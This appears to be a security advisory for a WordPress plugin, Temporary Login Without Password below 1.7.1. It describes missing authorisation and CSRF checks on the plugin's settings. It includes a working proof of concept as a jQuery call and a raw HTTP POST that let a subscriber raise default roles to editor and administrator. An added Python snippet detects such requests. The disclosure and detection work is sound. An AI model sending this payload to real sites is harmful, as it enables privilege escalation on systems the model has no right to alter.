wpexploit | Apple502j | WPEX-ID:15EED13F-3195-4F5D-8933-36695C830F4F
History: Nov 15, 2021 - 12:00 a.m.

Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update

2021-11-15 00:00:00
apple502j
Tags: wordpress, security, plugin, exploit, update, settings

EPSS: 0.001 (Percentile: 21.2%)

The plugin does not have authorisation and CSRF checks when updating its settings, which could allow any logged-in user, such as a subscriber, to update them.

jQuery.post("https://example.com/wp-admin/index.php", {
  "wtlwp-nonce": "foo", // Not validated
  tlwp_settings_data: {
    default_role: "editor",
    default_expiry_time: "month_after_access",
    visible_roles: ["editor", "administrator"],
    default_redirect_to: "wp_dashboard"
  }
})

POST /wp-admin/index.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Connection: close
Cookie: [subscriber+]

wtlwp-nonce=foo&tlwp_settings_data%5Bdefault_role%5D=editor&tlwp_settings_data%5Bdefault_expiry_time%5D=month_after_access&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=editor&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=administrator&tlwp_settings_data%5Bdefault_redirect_to%5D=wp_dashboard
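
A defender-side check for the request above, as an added example (not part of the original advisory or the plugin's code): it parses a captured HTTP request, extracts any `tlwp_settings_data[...]` fields, and reports the settings being changed. The sample request is constructed from the one shown above; `SENSITIVE_ROLES` and the function names are assumptions of this example, and it assumes request bodies are available from a proxy or WAF capture.

```python
from urllib.parse import parse_qsl

PREFIX = "tlwp_settings_data["
# Assumption of this example: roles worth flagging when a change mentions them.
SENSITIVE_ROLES = {"editor", "administrator"}

# Constructed sample, modelled on the request shown above.
SAMPLE = (
    "POST /wp-admin/index.php HTTP/1.1\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n"
    "Cookie: [subscriber+]\n"
    "\n"
    "wtlwp-nonce=foo&tlwp_settings_data%5Bdefault_role%5D=editor"
    "&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=editor"
    "&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=administrator"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.split("\n", 1)[0].split(" ", 2)
    return method, target.split("?", 1)[0], body.strip()


def settings_fields(body):
    """Collect tlwp_settings_data[...] fields; PHP-style name[] become lists."""
    fields = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if not name.startswith(PREFIX):
            continue
        key = name[len(PREFIX):]
        if key.endswith("][]"):
            fields.setdefault(key[:-3], []).append(value)
        elif key.endswith("]"):
            fields[key[:-1]] = value
    return fields


def inspect_request(raw):
    """Return a finding for a plugin settings update, or None if not one."""
    method, path, body = parse_request(raw)
    if method != "POST" or not path.startswith("/wp-admin/"):
        return None
    fields = settings_fields(body)
    if not fields:
        return None
    roles = set(fields.get("visible_roles", [])) | {fields.get("default_role")}
    return {"path": path, "settings": fields,
            "sensitive_roles": sorted(roles & SENSITIVE_ROLES)}
```

A finding is only a lead: correlate it with the role of the session that sent the request, since the issue described here is a low-privilege user making this change.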
